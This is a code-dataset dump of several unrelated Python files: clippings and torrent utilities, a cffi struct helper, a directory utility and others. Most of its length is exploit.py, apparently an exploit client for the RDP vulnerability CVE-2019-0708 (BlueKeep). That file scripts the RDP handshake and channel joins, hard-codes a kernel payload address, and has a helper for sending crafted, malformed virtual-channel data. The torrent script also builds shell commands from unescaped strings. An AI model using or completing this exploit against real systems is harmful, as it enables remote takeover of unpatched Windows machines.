| 23.366667 | 52 | 0.513552 | 607 | 0.865906 | 0 | 0 | 0 | 0 | 0 | 0 | 154 | 0.219686 |
7b580428c6c3fc7e1f2b5ec4c50a922c0d642dcf | 4,051 | py | Python | src/nti/externalization/integer_strings.py | NextThought/nti.externalization | 5a445b85fb809a7c27bf8dbe45c29032ece187d8 | ["Apache-2.0"] | null | null | null | src/nti/externalization/integer_strings.py | NextThought/nti.externalization | 5a445b85fb809a7c27bf8dbe45c29032ece187d8 | ["Apache-2.0"] | 78 | 2017-09-15T14:59:58.000Z | 2021-10-05T17:40:06.000Z | src/nti/externalization/integer_strings.py | NextThought/nti.externalization | 5a445b85fb809a7c27bf8dbe45c29032ece187d8 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Functions to represent potentially large integers as the shortest
possible human-readable and writable strings. The motivation is to be
able to take int ids as produced by an :class:`zc.intid.IIntId`
utility and produce something that can be written down and typed in by
a human. To this end, the strings produced have to be:
* One-to-one and onto the integer domain;
* As short as possible;
* While not being easily confused;
* Or accidentally permuted.
To meet those goals, we define an alphabet consisting of the ASCII
digits and upper and lowercase letters, leaving out troublesome pairs
(zero and upper and lower oh and upper queue, one and upper and lower
ell) (actually, those troublesome pairs will all map to the same
character).
We also put a version marker at the end of the string so we can evolve
this algorithm gracefully but still honor codes in the wild.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__all__ = [
'to_external_string',
'from_external_string',
]
# stdlib imports
import string
try:
maketrans = str.maketrans
except AttributeError: # Python 2
from string import maketrans # pylint:disable=no-name-in-module
translate = str.translate
# In the first version of the protocol, the version marker, which would
# come at the end, is always omitted. Subsequent versions will append
# a value that cannot be produced from the _VOCABULARY
_VERSION = '$'
# First, our vocabulary.
# Remove the letter values o and O, Q (confused with O if you're sloppy), l and L,
# and i and I, leaving the digits 1 and 0
_REMOVED = 'oOQlLiI'
_REPLACE = '0001111'
_VOCABULARY = ''.join(
reversed(sorted(list(set(string.ascii_letters + string.digits) - set(_REMOVED))))
)
# We translate the letters we removed
_TRANSTABLE = maketrans(_REMOVED, _REPLACE)
# Leaving us a base vocabulary to map integers into
_BASE = len(_VOCABULARY)
_ZERO_MARKER = '@' # Zero is special
def from_external_string(key):
"""
Turn the string in *key* into an integer.
>>> from nti.externalization.integer_strings import from_external_string
>>> from_external_string('xkr')
6773
:param str key: A native string, as produced by `to_external_string`.
(On Python 2, unicode *keys* are also valid.)
:raises ValueError: If the key is invalid or contains illegal characters.
:raises UnicodeDecodeError: If the key is a Unicode object, and contains
non-ASCII characters (which wouldn't be valid anyway)
"""
if not key:
raise ValueError("Improper key")
if not isinstance(key, str):
# Unicode keys cause problems on Python 2: The _TRANSTABLE is coerced
# to Unicode, which fails because it contains non-ASCII values.
# So instead, we encode the unicode string to ascii, which, if it is a
# valid key, will work
key = key.decode('ascii') if isinstance(key, bytes) else key.encode('ascii')
# strip the version if needed
key = key[:-1] if key[-1] == _VERSION else key
key = translate(key, _TRANSTABLE) # translate bad chars
if key == _ZERO_MARKER:
return 0
int_sum = 0
for idx, char in enumerate(reversed(key)):
int_sum += _VOCABULARY.index(char) * pow(_BASE, idx)
return int_sum
def to_external_string(integer):
"""
Turn an integer into a native string representation.
>>> from nti.externalization.integer_strings import to_external_string
>>> to_external_string(123)
'xk'
>>> to_external_string(123456789)
'kVxr5'
"""
# we won't step into the while if integer is 0
# so we just solve for that case here
if integer == 0:
return _ZERO_MARKER
result = ''
# Simple string concat benchmarks the fastest for this size data,
# among a list and an array.array( 'c' )
while integer > 0:
integer, remainder = divmod(integer, _BASE)
result = _VOCABULARY[remainder] + result
return result
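if __name__ == '__main__':
    # Quick self-check sketch (not part of the public API): the two
    # functions above are inverses over the non-negative integers.
    for n in (0, 1, 123, 6773, 123456789):
        assert from_external_string(to_external_string(n)) == n
    print(to_external_string(123456789))  # -> 'kVxr5'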
| 30.923664 | 85 | 0.709701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,752 | 0.679338 |
7b5a89b5d003d45628ff5ec0925287bf4802eb5a | 2,882 | py | Python | chokitto.py | WKSu/chokitto | 9eb0c7e69a62aede76cd0c8fd43dd4879bf03ff8 | ["MIT"] | null | null | null | chokitto.py | WKSu/chokitto | 9eb0c7e69a62aede76cd0c8fd43dd4879bf03ff8 | ["MIT"] | null | null | null | chokitto.py | WKSu/chokitto | 9eb0c7e69a62aede76cd0c8fd43dd4879bf03ff8 | ["MIT"] | 1 | 2021-01-16T18:51:57.000Z | 2021-01-16T18:51:57.000Z |
#!/usr/bin/python3
import argparse, os
from collections import defaultdict
from lib.data import *
from lib.exporters import *
from lib.filters import *
from lib.parsers import *
def parse_arguments():
arg_parser = argparse.ArgumentParser(description='chokitto')
arg_parser.add_argument('input', help='path to clippings file')
arg_parser.add_argument('-o', '--output', help='path to output file (default: STDOUT)')
arg_parser.add_argument('-p', '--parser', default='kindle', choices=list(PARSER_MAP.keys()), help='parser for clippings file (default: kindle)')
arg_parser.add_argument('-e', '--exporter', default='markdown', help='clipping exporter (default: markdown)')
arg_parser.add_argument('-m', '--merge', action='store_true', help='merge clippings of different types if they occur at the same location (default: False)')
arg_parser.add_argument('-f', '--filters', nargs='*', help='list of filters to apply (default: None, format: "filter(\'arg\',\'arg\')")')
arg_parser.add_argument('-ls', '--list', action='store_true', help='list titles of documents in clippings file and exit (default: False)')
arg_parser.add_argument('-v', '--verbose', action='store_true', help='set verbosity (default: False)')
return arg_parser.parse_args()
def get_user_input(prompt, options=['y', 'n']):
ans = None
while ans not in options:
ans = input(f"{prompt} [{'/'.join(options)}] ")
return ans
def main():
args = parse_arguments()
# parse clippings
parser = PARSER_MAP[args.parser](verbose=args.verbose)
documents = parser.parse(args.input)
# merge and deduplicate clippings
if args.merge:
for title, author in documents:
documents[(title, author)].merge_clippings()
documents[(title, author)].deduplicate_clippings()
# set up filters
filters = parse_filters(args.filters) if args.filters else []
if filters:
# print filters
if args.verbose:
print("Filters (%d total):" % len(filters))
for filt in filters:
print(" %s" % filt)
# apply filters
documents = apply_filters(documents, filters)
# list documents (and exit if list flag was used)
if args.verbose or args.list:
print("Documents (%d total):" % len(documents))
for title, author in sorted(documents):
print(" %s" % documents[(title, author)])
if args.list: return
# set up exporter
exporter = parse_exporter(args.exporter)
if args.output:
# check if file already exists
if os.path.exists(args.output):
ans = get_user_input(f"File '{args.output}' already exists. Overwrite?")
if ans == 'n':
return
exporter.write(documents, args.output)
if args.verbose: print(f"Output:\n Output was saved to '{args.output}' using {exporter}.")
else:
if args.verbose: print("Output:\n")
print(exporter(documents))
if __name__ == '__main__':
main()
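# Example invocation (file names are illustrative):
#   python chokitto.py "My Clippings.txt" -p kindle -e markdown -m -o notes.md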
| 37.428571 | 161 | 0.683553 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,044 | 0.362248 |
7b5ac6eff9c37a22900d99e140cd578daaa0f186 | 736 | py | Python | torrent.py | olazona/colabtorrent | bbddec0fc12eab672a711769f7d071ada8235c86 | ["Apache-2.0"] | 3 | 2020-07-30T09:29:00.000Z | 2022-02-05T05:19:30.000Z | torrent.py | olazona/colabtorrent | bbddec0fc12eab672a711769f7d071ada8235c86 | ["Apache-2.0"] | null | null | null | torrent.py | olazona/colabtorrent | bbddec0fc12eab672a711769f7d071ada8235c86 | ["Apache-2.0"] | 4 | 2020-03-31T15:42:38.000Z | 2021-09-27T07:30:07.000Z |
# -*- coding: utf-8 -*-
"""Torrent.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1Uo1_KHGxOe_Dh4-DjQyEb0wROp-tMv0w
"""
import os  # module-level import: download() below also uses os
TorrName = 'YOUR TORRENT NAME'
FolderPath = f'/content/drive/My Drive/{TorrName}'
TorrPath = f'{TorrName}.torrent'
def init():
import os
os.system('apt-get install transmission-cli')
from google.colab import drive
drive.mount('/content/drive')
def download(loc, tor):
assert (os.path.exists(tor)==True), "The torrent file doesn't exist"
print("If the cell is running for a long time check if the torrent has no seeders!")
os.system(f"transmission-cli -w '{loc}' {tor}")
print("DONE")
init()
download(FolderPath,TorrPath)
| 25.37931 | 86 | 0.71875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 470 | 0.638587 |
7b5b098de65214be758959ec7c9a6aae3055a94c | 3,197 | py | Python | src/py21cmmc/_21cmfast/_utils.py | BradGreig/Hybrid21CMMC | 984aa88ee4543db24095a3ba8529e1f4d0b1048d | ["MIT"] | null | null | null | src/py21cmmc/_21cmfast/_utils.py | BradGreig/Hybrid21CMMC | 984aa88ee4543db24095a3ba8529e1f4d0b1048d | ["MIT"] | null | null | null | src/py21cmmc/_21cmfast/_utils.py | BradGreig/Hybrid21CMMC | 984aa88ee4543db24095a3ba8529e1f4d0b1048d | ["MIT"] | null | null | null |
"""
Utilities that help with wrapping various C structures.
"""
class StructWithDefaults:
"""
A class which provides a convenient interface to create a C structure with defaults specified.
It is provided for the purpose of *creating* C structures in Python to be passed to C functions, where sensible
defaults are available. Structures which are created within C and passed back do not need to be wrapped.
This provides a *fully initialised* structure, and will fail if not all fields are specified with defaults.
    .. note:: The actual C structure is obtained by calling an instance. It is auto-generated when called, based on the
parameters in the class.
.. warning:: This class will *not* deal well with parameters of the struct which are pointers. All parameters
should be primitive types, except for strings, which are dealt with specially.
Parameters
----------
ffi : cffi object
The ffi object from any cffi-wrapped library.
"""
_name = None
_defaults_ = {}
ffi = None
def __init__(self, **kwargs):
for k, v in self._defaults_.items():
# Prefer arguments given to the constructor.
if k in kwargs:
v = kwargs[k]
try:
setattr(self, k, v)
except AttributeError:
# The attribute has been defined as a property, save it as a hidden variable
setattr(self, "_" + k, v)
self._logic()
# Set the name of this struct in the C code
if self._name is None:
self._name = self.__class__.__name__
# A little list to hold references to strings so they don't de-reference
self._strings = []
def _logic(self):
pass
def new(self):
"""
Return a new empty C structure corresponding to this class.
"""
obj = self.ffi.new("struct " + self._name + "*")
return obj
def __call__(self):
"""
Return a filled C Structure corresponding to this instance.
"""
obj = self.new()
self._logic() # call this here to make sure any changes by the user to the arguments are re-processed.
for fld in self.ffi.typeof(obj[0]).fields:
key = fld[0]
val = getattr(self, key)
# Find the value of this key in the current class
if isinstance(val, str):
# If it is a string, need to convert it to C string ourselves.
val = self.ffi.new('char[]', getattr(self, key).encode())
try:
setattr(obj, key, val)
except TypeError:
print("For key %s, value %s:" % (key, val))
raise
self._cstruct = obj
return obj
@property
def pystruct(self):
"A Python dictionary containing every field which needs to be initialized in the C struct."
obj = self.new()
return {fld[0]:getattr(self, fld[0]) for fld in self.ffi.typeof(obj[0]).fields}
def __getstate__(self):
        return {k:v for k,v in self.__dict__.items() if k not in ["_strings", "_cstruct"]}
| 32.622449 | 119 | 0.597435 | 3,131 | 0.979356 | 0 | 0 | 246 | 0.076947 | 0 | 0 | 1,747 | 0.54645 |
7b5b0c3580d4b9ad4e0f4e13f5794c9e38d7df6a | 160 | py | Python | components/charts.py | tufts-ml/c19-dashboard | be88f91ca74dd154566bd7b36fe482565331346b | ["MIT"] | null | null | null | components/charts.py | tufts-ml/c19-dashboard | be88f91ca74dd154566bd7b36fe482565331346b | ["MIT"] | 5 | 2020-04-10T20:36:18.000Z | 2020-04-28T19:42:15.000Z | components/charts.py | tufts-ml/c19-dashboard | be88f91ca74dd154566bd7b36fe482565331346b | ["MIT"] | null | null | null |
import dash_html_components as html
def chart_panel() -> html.Div:
return html.Div(className='row', children=[html.Div(id='output', className='column')])
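# Usage sketch (hypothetical wiring; `app` is a dash.Dash instance):
#   app.layout = chart_panel()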
| 26.666667 | 90 | 0.725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 21 | 0.13125 |
7b5bf002a4841de751ef7a81520f03f1fc8e3906 | 2,144 | py | Python | lib/bes/fs/dir_util.py | reconstruir/bes | 82ff54b2dadcaef6849d7de424787f1dedace85c | ["Apache-2.0"] | null | null | null | lib/bes/fs/dir_util.py | reconstruir/bes | 82ff54b2dadcaef6849d7de424787f1dedace85c | ["Apache-2.0"] | null | null | null | lib/bes/fs/dir_util.py | reconstruir/bes | 82ff54b2dadcaef6849d7de424787f1dedace85c | ["Apache-2.0"] | null | null | null |
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
import os, os.path as path, shutil
import datetime
from .file_match import file_match
from .file_util import file_util
class dir_util(object):
@classmethod
def is_empty(clazz, d):
return clazz.list(d) == []
@classmethod
def list(clazz, d, relative = False, patterns = None):
'Return a list of a d contents. Returns absolute paths unless relative is True.'
result = sorted(os.listdir(d))
if not relative:
result = [ path.join(d, f) for f in result ]
if patterns:
result = file_match.match_fnmatch(result, patterns, file_match.ANY)
return result
@classmethod
def list_dirs(clazz, d):
'Like list() but only returns dirs.'
    return [ f for f in clazz.list(d) if path.isdir(f) ]  # list() already returns absolute paths
@classmethod
def empty_dirs(clazz, d):
return [ f for f in clazz.list_dirs(d) if clazz.is_empty(f) ]
@classmethod
def all_parents(clazz, d):
result = []
while True:
parent = path.dirname(d)
result.append(parent)
if parent == '/':
break
d = parent
return sorted(result)
@classmethod
def older_dirs(clazz, dirs, days = 0, seconds = 0, microseconds = 0,
milliseconds = 0, minutes = 0, hours = 0, weeks = 0):
delta = datetime.timedelta(days = days,
seconds = seconds,
microseconds = microseconds,
milliseconds = milliseconds,
minutes = minutes,
hours = hours,
weeks = weeks)
now = datetime.datetime.now()
ago = now - delta
result = []
for d in dirs:
mtime = datetime.datetime.fromtimestamp(os.stat(d).st_mtime)
if mtime <= ago:
result.append(d)
return result
@classmethod
def remove(clazz, d):
if path.isfile(d):
raise ValueError('Not a directory: "{}"'.format(d))
if not path.exists(d):
      raise ValueError('Directory does not exist: "{}"'.format(d))
os.rmdir(d)
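# Usage sketch:
#   dir_util.list('/tmp', patterns = [ '*.log' ])               # absolute paths
#   dir_util.older_dirs(dir_util.list_dirs('/tmp'), days = 30)  # stale dirs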
| 30.197183 | 90 | 0.588619 | 1,930 | 0.900187 | 0 | 0 | 1,875 | 0.874534 | 0 | 0 | 265 | 0.123601 |
7b5cbfeebbb6c1b6c874a7c85487913e09de67c0 | 24,540 | py | Python | exploit.py | yassineaboukir/CVE-2019-0708 | 4f4ff5a9eef5ed4cda92376b25667fd5272d9753 | ["Apache-2.0"] | null | null | null | exploit.py | yassineaboukir/CVE-2019-0708 | 4f4ff5a9eef5ed4cda92376b25667fd5272d9753 | ["Apache-2.0"] | null | null | null | exploit.py | yassineaboukir/CVE-2019-0708 | 4f4ff5a9eef5ed4cda92376b25667fd5272d9753 | ["Apache-2.0"] | null | null | null |
import os
import argparse
from struct import pack
from twisted.internet import reactor
from twisted.application.reactors import Reactor
from twisted.internet.endpoints import HostnameEndpoint
from twisted.internet.protocol import ClientFactory
from pyrdp.core.ssl import ClientTLSContext
from pyrdp.mitm.layerset import RDPLayerSet
from pyrdp.mitm.state import RDPMITMState
from pyrdp.mitm.config import MITMConfig
from pyrdp.layer import LayerChainItem, VirtualChannelLayer, DeviceRedirectionLayer, ClipboardLayer
from pyrdp.pdu import MCSAttachUserConfirmPDU, MCSAttachUserRequestPDU, MCSChannelJoinConfirmPDU, \
MCSChannelJoinRequestPDU, MCSConnectInitialPDU, MCSConnectResponsePDU, MCSDisconnectProviderUltimatumPDU, \
MCSDomainParams, MCSErectDomainRequestPDU, MCSSendDataIndicationPDU, MCSSendDataRequestPDU, \
ClientChannelDefinition, PDU, ClientExtraInfo, ClientInfoPDU, DemandActivePDU, MCSSendDataIndicationPDU, \
ShareControlHeader, ConfirmActivePDU, SynchronizePDU, ShareDataHeader, ControlPDU, DeviceRedirectionPDU, \
DeviceListAnnounceRequest, X224DataPDU, NegotiationRequestPDU, NegotiationResponsePDU, X224ConnectionConfirmPDU, \
X224ConnectionRequestPDU, X224DisconnectRequestPDU, X224ErrorPDU, NegotiationFailurePDU, MCSDomainParams, \
ClientDataPDU, GCCConferenceCreateRequestPDU, SlowPathPDU, SetErrorInfoPDU, DeviceRedirectionClientCapabilitiesPDU
from pyrdp.enum import NegotiationFailureCode, NegotiationProtocols, EncryptionMethod, ChannelOption, MCSChannelName, \
ParserMode, SegmentationPDUType, ClientInfoFlags, CapabilityType, VirtualChannelCompressionFlag, SlowPathPDUType, \
SlowPathDataType, DeviceRedirectionPacketID, DeviceRedirectionComponent, VirtualChannelPDUFlag
from pyrdp.pdu.rdp.negotiation import NegotiationRequestPDU
from pyrdp.pdu.rdp.capability import Capability
from pyrdp.parser import NegotiationRequestParser, NegotiationResponseParser, ClientConnectionParser, GCCParser, \
ServerConnectionParser
from pyrdp.mcs import MCSClientChannel
from pyrdp.logging import LOGGER_NAMES, SessionLogger
import logging
# Hard-coded constant
PAYLOAD_HEAD_ADDR = 0xfffffa8008711010 + 0x38
class Exploit(ClientFactory):
def __init__(self, _reactor: Reactor, host: str, port: int, ip: str, bport: int):
self.reactor = _reactor
self.host = host
self.port = port
self.ip = ip
self.bport = bport
self.server = RDPLayerSet()
self.server.tcp.createObserver(onConnection = self.sendConnectionRequest)
self.server.x224.createObserver(onConnectionConfirm = self.onConnectionConfirm)
self.server.mcs.createObserver(
onConnectResponse = self.onConnectResponse,
onAttachUserConfirm = self.onAttachUserConfirm,
onChannelJoinConfirm = self.onChannelJoinConfirm,
onSendDataIndication = self.onSendDataIndication
)
self.server.slowPath.createObserver(
onDemandActive = self.onDemandActive,
onData = self.onSlowPathPDUReceived
)
logger = logging.getLogger(LOGGER_NAMES.MITM_CONNECTIONS)
log = SessionLogger(logger, "replay")
config = MITMConfig()
self.state = RDPMITMState(config, log.sessionID)
self.extra_channels = []
self.name_to_id = {}
self.virt_layer = {}
def appendChannel(self, name, flag):
self.extra_channels.append(
ClientChannelDefinition(name, flag)
)
def linkChannelIDWithName(self, channelID, name):
self.state.channelMap[channelID] = name
self.name_to_id[name] = channelID
def sendConnectionRequest(self):
print('Connected to RDP server')
print('Sending X224ConnectionRequestPDU...')
proto = NegotiationProtocols.SSL # | NegotiationProtocols.CRED_SSP
request = NegotiationRequestPDU(None, 0, proto)
parser = NegotiationRequestParser()
payload = parser.write(request)
self.server.x224.sendConnectionRequest(payload)
def onConnectionConfirm(self, pdu: X224ConnectionConfirmPDU):
print('Connection confirmed')
print('Sending MCSConnectInitialPDU...')
parser = NegotiationResponseParser()
response = parser.parse(pdu.payload)
if isinstance(response, NegotiationFailurePDU):
print('The negotiation failed: {}'.format(str(NegotiationFailureCode.getMessage(response.failureCode))))
os.exit(0)
print('The server selected {}'.format(response.selectedProtocols))
self.state.useTLS = response.tlsSelected
if self.state.useTLS:
self.startTLS()
gcc_parser = GCCParser()
client_parser = ClientConnectionParser()
client_data_pdu = ClientDataPDU.generate(
serverSelectedProtocol=response.selectedProtocols,
encryptionMethods=EncryptionMethod.ENCRYPTION_40BIT
)
# Define channels, which include MS_T120 of course
client_data_pdu.networkData.channelDefinitions += self.extra_channels
self.state.channelDefinitions = client_data_pdu.networkData.channelDefinitions
gcc_pdu = GCCConferenceCreateRequestPDU("1", client_parser.write(client_data_pdu))
# FIXME: pyrdp has a typo in this function
max_params = MCSDomainParams.createMaximum()
max_params.maxUserIDs = 65535
mcs_pdu = MCSConnectInitialPDU(
callingDomain=b'\x01',
calledDomain=b'\x01',
upward=1,
targetParams=MCSDomainParams.createTarget(34, 2),
minParams=MCSDomainParams.createMinimum(),
maxParams=max_params,
payload=gcc_parser.write(gcc_pdu)
)
self.server.mcs.sendPDU(mcs_pdu)
def onConnectResponse(self, pdu: MCSConnectResponsePDU):
print('Got MCSConnectionResponsePDU')
gcc_parser = GCCParser()
server_parser = ServerConnectionParser()
gcc_pdu = gcc_parser.parse(pdu.payload)
server_data = server_parser.parse(gcc_pdu.payload)
print('The server selected {}'.format(str(server_data.securityData.encryptionMethod)))
self.state.securitySettings.setEncryptionMethod(server_data.securityData.encryptionMethod)
self.state.securitySettings.setServerRandom(server_data.securityData.serverRandom)
if server_data.securityData.serverCertificate:
self.state.securitySettings.setServerPublicKey(server_data.securityData.serverCertificate.publicKey)
for index in range(len(server_data.networkData.channels)):
channelID = server_data.networkData.channels[index]
name = self.state.channelDefinitions[index].name
print('{} <---> Channel {}'.format(name, channelID))
self.linkChannelIDWithName(channelID, name)
self.io_channelID = server_data.networkData.mcsChannelID
self.linkChannelIDWithName(self.io_channelID, MCSChannelName.IO)
print('Sending MCSErectDomainRequestPDU...')
erect_pdu = MCSErectDomainRequestPDU(1, 1, b'')
self.server.mcs.sendPDU(erect_pdu)
print('Sending MCSAttachUserRequestPDU...')
attach_pdu = MCSAttachUserRequestPDU()
self.server.mcs.sendPDU(attach_pdu)
# Issue one ChannelJoinRequest
# If all the requests are consumed, then send SecurityExchangePDU and ClientInfoPDU
def consumeChannelJoinRequestOrFinish(self):
if self.channel_join_req_queue:
channelID = self.channel_join_req_queue.pop()
name = self.state.channelMap[channelID]
print('Attempting to join {}...'.format(name))
join_pdu = MCSChannelJoinRequestPDU(self.initiator, channelID, b'')
self.server.mcs.sendPDU(join_pdu)
else :
self.sendSecurityExchangePDU()
self.sendClientInfoPDU()
def onAttachUserConfirm(self, pdu: MCSAttachUserConfirmPDU):
print('Got MCSAttachUserConfirmPDU')
self.initiator = pdu.initiator
print('User Channel ID: {}'.format(self.initiator))
self.linkChannelIDWithName(self.initiator, 'User')
self.channels = {}
self.channel_join_req_queue = list(self.state.channelMap.keys())
self.consumeChannelJoinRequestOrFinish()
def onChannelJoinConfirm(self, pdu: MCSChannelJoinConfirmPDU):
if pdu.result != 0:
print('ChannelJoinRequest failed.')
os.exit(0)
print('Joined {}'.format(self.state.channelMap[pdu.channelID]))
channel = MCSClientChannel(self.server.mcs, self.initiator, pdu.channelID)
self.channels[pdu.channelID] = channel
self.setupChannel(channel)
self.consumeChannelJoinRequestOrFinish()
def setupChannel(self, channel):
userID = channel.userID
channelID = channel.channelID
name = self.state.channelMap[channelID]
if name == MCSChannelName.DEVICE_REDIRECTION:
self.setupDeviceChannel(channel)
elif name == MCSChannelName.CLIPBOARD:
self.setupClipboardChannel(channel)
elif name == MCSChannelName.IO:
self.setupIOChannel(channel)
else :
self.setupVirtualChannel(channel)
def setupDeviceChannel(self, device_channel):
security = self.state.createSecurityLayer(ParserMode.CLIENT, True)
virtual_channel = VirtualChannelLayer(activateShowProtocolFlag=False)
redirection_layer = DeviceRedirectionLayer()
redirection_layer.createObserver(onPDUReceived = self.onDeviceRedirectionPDUReceived)
LayerChainItem.chain(device_channel, security, virtual_channel, redirection_layer)
self.server.redirection_layer = redirection_layer
def setupClipboardChannel(self, clip_channel):
security = self.state.createSecurityLayer(ParserMode.CLIENT, True)
virtual_channel = VirtualChannelLayer()
clip_layer = ClipboardLayer()
clip_layer.createObserver(onPDUReceived = self.onPDUReceived)
LayerChainItem.chain(clip_channel, security, virtual_channel, clip_layer)
def setupIOChannel(self, io_channel):
self.server.security = self.state.createSecurityLayer(ParserMode.CLIENT, False)
self.server.fastPath = self.state.createFastPathLayer(ParserMode.CLIENT)
self.server.security.createObserver(onLicensingDataReceived = self.onLicensingDataReceived)
LayerChainItem.chain(io_channel, self.server.security, self.server.slowPath)
self.server.segmentation.attachLayer(SegmentationPDUType.FAST_PATH, self.server.fastPath)
def setupVirtualChannel(self, channel):
security = self.state.createSecurityLayer(ParserMode.CLIENT, True)
layer = VirtualChannelLayer(activateShowProtocolFlag=False)
layer.createObserver(onPDUReceived = self.onPDUReceived)
LayerChainItem.chain(channel, security, layer)
self.virt_layer[channel] = layer
def onSendDataIndication(self, pdu: MCSSendDataIndicationPDU):
if pdu.channelID in self.channels:
self.channels[pdu.channelID].recv(pdu.payload)
else :
print('Warning: channelID {} is not included in the maintained channels'.format(pdu.channelID))
def onLicensingDataReceived(self, data: bytes):
if self.state.useTLS:
self.server.security.securityHeaderExpected = False
def onSlowPathPDUReceived(self, pdu: SlowPathPDU):
if isinstance(pdu, SetErrorInfoPDU):
print(pdu)
def onPDUReceived(self, pdu: PDU):
print(pdu)
assert 0
def sendSecurityExchangePDU(self):
if self.state.securitySettings.encryptionMethod == EncryptionMethod.ENCRYPTION_NONE:
return # unnecessary
# FIXME: we don't support ENCRYPTION_40BIT yet
# because by default the server selects ENCRYPTION_NONE when TLS is specified
assert 0
def sendClientInfoPDU(self):
print('sending ClientInfoPDU...')
AF_INET = 0x2
extra_info = ClientExtraInfo(
AF_INET,
'example.com'.encode('utf-16le'),
'C:\\'.encode('utf-16le')
)
English_US = 1033
client_info_pdu = ClientInfoPDU(
English_US | (English_US << 16),
ClientInfoFlags.INFO_UNICODE,
'', '', '', '', '',
extra_info
)
self.server.security.sendClientInfo(client_info_pdu)
def onDemandActive(self, pdu: DemandActivePDU):
print('Got DemandActivePDU')
print('Sending ConfirmActivePDU...')
cap_sets = pdu.parsedCapabilitySets
if CapabilityType.CAPSTYPE_VIRTUALCHANNEL in cap_sets: # FIXME: we should compress data for efficient spraying
cap_sets[CapabilityType.CAPSTYPE_VIRTUALCHANNEL].flags = VirtualChannelCompressionFlag.VCCAPS_NO_COMPR
self.has_bitmapcache = False
if CapabilityType.CAPSTYPE_BITMAPCACHE in cap_sets:
cap_sets[CapabilityType.CAPSTYPE_BITMAPCACHE] = Capability(CapabilityType.CAPSTYPE_BITMAPCACHE, b"\x00" * 36)
self.has_bitmapcache = True
TS_PROTOCOL_VERSION = 0x1
header = ShareControlHeader(SlowPathPDUType.CONFIRM_ACTIVE_PDU, TS_PROTOCOL_VERSION, self.initiator)
server_channelID = 0x03EA
confirm_active_pdu = ConfirmActivePDU(header, pdu.shareID, server_channelID, pdu.sourceDescriptor, -1, cap_sets, None)
self.server.slowPath.sendPDU(confirm_active_pdu)
print('Sending SynchronizePDU...')
STREAM_LOW = 1
header = ShareDataHeader(
SlowPathPDUType.DATA_PDU,
TS_PROTOCOL_VERSION,
self.initiator,
pdu.shareID,
STREAM_LOW,
8,
SlowPathDataType.PDUTYPE2_SYNCHRONIZE,
0,
0
)
SYNCMSGTYPE_SYNC = 1
sync_pdu = SynchronizePDU(header, SYNCMSGTYPE_SYNC, server_channelID)
self.server.slowPath.sendPDU(sync_pdu)
print('Sending ControlPDU(Cooperate)...')
header = ShareDataHeader(
SlowPathPDUType.DATA_PDU,
TS_PROTOCOL_VERSION,
self.initiator,
pdu.shareID,
STREAM_LOW,
12,
SlowPathDataType.PDUTYPE2_CONTROL,
0,
0
)
CTRLACTION_COOPERATE = 4
control_pdu = ControlPDU(header, CTRLACTION_COOPERATE, 0, 0)
self.server.slowPath.sendPDU(control_pdu)
print('Sending ControlPDU(Request Control)...')
CTRLACTION_REQUEST_CONTROL = 1
control_pdu = ControlPDU(header, CTRLACTION_REQUEST_CONTROL, 0, 0)
self.server.slowPath.sendPDU(control_pdu)
if self.has_bitmapcache:
print('Sending PersistentKeyListPDU...')
header = ShareDataHeader(
SlowPathPDUType.DATA_PDU,
TS_PROTOCOL_VERSION,
self.initiator,
pdu.shareID,
STREAM_LOW,
0,
SlowPathDataType.PDUTYPE2_BITMAPCACHE_PERSISTENT_LIST,
0,
0
)
# This PDU is hard-coded because pyrdp doesn't support it...
payload = b'\x00' * 20 + b'\x03' + b'\x00' * 3
pers_pdu = SlowPathPDU(header, payload)
self.server.slowPath.sendPDU(pers_pdu)
print('Sending FontListPDU...')
header = ShareDataHeader(
SlowPathPDUType.DATA_PDU,
TS_PROTOCOL_VERSION,
self.initiator,
pdu.shareID,
STREAM_LOW,
0,
SlowPathDataType.PDUTYPE2_FONTLIST,
0,
0
)
# This PDU is also hard-coded...
payload = b'\x00' * 4 + b'\x03\x00' + b'\x32\x00'
font_pdu = SlowPathPDU(header, payload)
self.server.slowPath.sendPDU(font_pdu)
print('Completed handshake')
def writeDataIntoVirtualChannel(self, name, data: bytes, length=-1, flags=VirtualChannelPDUFlag.CHANNEL_FLAG_FIRST | VirtualChannelPDUFlag.CHANNEL_FLAG_LAST):
channelID = self.name_to_id[name]
channel = self.channels[channelID]
# Send VirtualChannelPDU(manually)
payload = b''
if length == -1:
length = len(data)
payload += pack('<I', length)
payload += pack('<I', flags)
payload += data
MAX_CHUNK_SIZE = 1600
assert len(payload) <= MAX_CHUNK_SIZE
# Since we send (possibly) a bit malformed pdu, we don't use virt_layer.sendBytes
self.virt_layer[channel].previous.sendBytes(payload)
def onDeviceRedirectionPDUReceived(self, pdu: DeviceRedirectionPDU):
if pdu.packetID == DeviceRedirectionPacketID.PAKID_CORE_SERVER_ANNOUNCE:
print('Server Announce Request came')
print('Sending Client Announce Reply...')
reply_pdu = DeviceRedirectionPDU(
DeviceRedirectionComponent.RDPDR_CTYP_CORE,
DeviceRedirectionPacketID.PAKID_CORE_CLIENTID_CONFIRM,
pdu.payload
)
self.server.redirection_layer.sendPDU(reply_pdu)
print('Sending Client Name Request...')
payload = b''
payload += pack('<I', 0)
payload += pack('<I', 0)
name = b'hoge\x00'
payload += pack('<I', len(name))
payload += name
client_name_pdu = DeviceRedirectionPDU(
DeviceRedirectionComponent.RDPDR_CTYP_CORE,
DeviceRedirectionPacketID.PAKID_CORE_CLIENT_NAME,
payload
)
self.server.redirection_layer.sendPDU(client_name_pdu)
elif pdu.packetID == DeviceRedirectionPacketID.PAKID_CORE_SERVER_CAPABILITY:
print('Server Core Capability Request came')
print('Sending Client Core Capability Response...')
resp_pdu = DeviceRedirectionClientCapabilitiesPDU(pdu.capabilities)
self.server.redirection_layer.sendPDU(resp_pdu)
elif pdu.packetID == DeviceRedirectionPacketID.PAKID_CORE_CLIENTID_CONFIRM:
print('Server Client ID Confirm came')
print('Sending Client Device List Announce Request...')
req_pdu = DeviceListAnnounceRequest([])
self.server.redirection_layer.sendPDU(req_pdu)
